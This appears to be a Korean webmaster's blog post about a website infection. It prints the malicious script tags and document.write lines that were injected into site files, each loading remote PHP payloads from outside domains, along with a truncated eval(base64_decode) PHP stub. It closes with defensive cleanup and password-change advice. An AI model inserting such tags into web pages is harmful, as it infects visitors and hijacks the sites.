스크립트 바이러스, 악성코드, script

스크립트 바이러스? 로 고생을 했습니다..

 

증상은 html, asp, php, js 파일에 악성 스크립트 소스가 삽입 변조되어 사이트 접속시

매우 느리게 반응하며 또는 창이 열리지 않습니다.

 

인터넷 창 하단 상태표시줄에도 에러표시가 나타납니다.

또한 Adobe Reader 를 언급하며 열리지 않는 경우도 있었습니다.

 

 

 

문제의 스크립트 소스입니다. (각 ftp 계정마다 특정 도메인주소가 다르게 삽입됩니다.)

 

<script src=http://afrique-solidarite.org/sessions/txt.php ></script>

<script src=http://lilleleather.com/script/order_status.php ></script>

 

<script src=http://guilhermedealmeida.com.br/julho/cool_style1.php ></script>

 

document.write('<script src=http://afrique-solidarite.org/sessions/txt.php ></script>');

 

document.write('<script src=http://fittenfriss.hu/hirlev/hir_koszonet.php ></script>');

document.write('<script src=http://lg-300.1gb.ru/katal4/style.php ></script>');

document.write('<script src=http://shandilya.com/js/default.php ></script>');

document.write('<script src=http://rustytolin.com/images/gifimg.php ></script>');

document.write('<script src=http://guilhermedealmeida.com.br/julho/cool_style1.php ></script>');

 

 

<?php eval(base64_decode

.....

...

..

.

?>

 

 

위의 소스외에도 특정 images 폴더안에는 slmv 폴더가 생성되는 경우도 있고 gifimg.php 파일이 생성되어 있기도 하는 것 같습니다.

 

 

감염경로는 여러 원인이 있을 수 있지만..

ftp상의 파일 마지막 수정날짜를 보면 누군가 변조한 것으로 생각됩니다.

 

쉽게 생각해보면 계정 정보의 유출이 아닐까 합니다.

유출원인은..

컴퓨터가 바이러스 및 악성코드에 감염되어

ftp 접속시 아이디 및 비밀번호가 전송되도록 하여 그 정보를 이용하여 변조하는 것으로 생각됩니다..

 

------------------------------------------------------------------------------

 

해결방법으로는..

 

1. 우선 컴퓨터내의 바이러스 감염여부를 진단하여 보시고..

 

2. ftp계정 비밀번호를 변경합니다. (변경하지 않으면 또다시 악성 소스가 삽입됩니다.)

 

3. 감염되어있는 파일들의 악성 스크립트 소스를 모두 제거하여 주셔야 합니다..

 

 

주기적으로 바이러스 및 악성코드 점검이 필요하며

계정 비밀번호도 자주 변경하여 주시는 것이 현재로서의 예방책이라고 생각됩니다.